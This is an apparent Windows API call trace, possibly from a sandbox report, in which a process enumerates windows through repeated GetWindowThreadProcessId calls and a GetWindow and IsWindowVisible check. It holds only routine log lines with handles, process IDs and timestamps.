	[0384.122] GetWindowThreadProcessId (in: hWnd=0x1047e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe48
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x1046e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xbc8
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x1045e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xdf8
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x1044c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x318
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x10440, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xcac
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x10438, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x8bc
	[0384.122] GetWindowThreadProcessId (in: hWnd=0x10434, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf9c
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10430, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf48
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10414, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe40
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10410, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xecc
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x1040c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xeb8
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10408, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe80
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10404, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe98
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10400, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe60
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x103fc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xee4
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x103ee, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf00
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10398, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xdf0
	[0384.123] GetWindowThreadProcessId (in: hWnd=0x10388, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe1c
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x10380, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xdd0
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x1036c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xd94
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x10368, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xd74
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x10364, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xd00
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x1035e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xcd8
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x20240, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc84
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xca4
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x2010e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc64
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x10344, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc24
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x1032a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb84
	[0384.124] GetWindowThreadProcessId (in: hWnd=0x10316, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xbac
	[0384.125] GetWindowThreadProcessId (in: hWnd=0x102f8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x384
	[0384.125] GetWindowThreadProcessId (in: hWnd=0x102de, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xab8
	[0384.125] GetWindowThreadProcessId (in: hWnd=0x102da, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x33c
	[0384.125] GetWindowThreadProcessId (in: hWnd=0x102d0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa44
	[0384.125] GetWindowThreadProcessId (in: hWnd=0x102cc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa64
	[0384.126] GetWindow (hWnd=0x102cc, uCmd=0x4) returned 0x0
	[0384.126] IsWindowVisible (hWnd=0x102cc) returned 0
	[0384.126] GetWindowThreadProcessId (in: hWnd=0x102c8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x8a8
	[0384.126] GetWindowThreadProcessId (in: hWnd=0x102c4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xaf0
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x102c0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x88c
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x102bc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb04
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x102b0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x910
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x102ac, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x230
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x30298, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xac0
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x2029a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xab4
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xaac
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x3d0
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x10242, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x978
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x10228, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa7c
	[0384.127] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x59c
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x20212, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa88
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x1021c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa6c
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa68
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x9f8
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa04
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x924
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x8dc
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x7dc
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x768
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x764
	[0384.128] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x820
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x810
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x794
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x83c
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x7ac
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb44
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb5c
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x838
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.129] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x818
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x5b8
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x494
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1ec
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x440
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x7e8
	[0384.130] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x730
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x2c8
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x31c
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x330
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x128
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x5c8
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x6f8
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x358
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x73c
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb0
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x250
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x240
	[0384.131] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x790
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x61c
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x540
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x538
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x568
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x538
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x568
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x538
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x540
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x540
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x57c
	[0384.132] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x554
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x528
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x79c
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4e0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.133] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x44c
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x778
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x460
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x558
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4d0
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x12d0
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x12cc
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x12c8
	[0384.134] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1290
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1218
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1214
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x11ec
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x11e8
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x11cc
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x1140
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe6c
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x6e8
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc6c
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf94
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xffc
	[0384.135] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf74
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf08
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf0c
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xed8
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xe90
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xea8
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfa8
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfbc
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfb8
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfb4
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfb0
	[0384.136] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfac
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfc0
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xfd0
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf88
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf84
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xf80
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xde0
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xddc
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xdd8
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xd34
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xd10
	[0384.137] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xd0c
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc9c
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc74
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc1c
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xc08
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xabc
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x24c
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xbb0
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xbfc
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb10
	[0384.138] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x374
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x368
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb28
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xae8
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb14
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x95c
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa8c
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x46c
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb3c
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa90
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xad0
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa9c
	[0384.139] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xaa0
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb1c
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x7e0
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa74
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x694
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xa28
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x9b0
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x8d8
	[0384.140] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x940
	[0384.465] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x93c
	[0385.480] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x4ec
	[0386.166] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x150
	[0386.445] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x720
	[0386.445] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x3c4
	[0386.445] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x7d4
	[0386.445] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0x6c8
	[0386.445] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x20dba0 | out: lpdwProcessId=0x20dba0) returned 0xb54
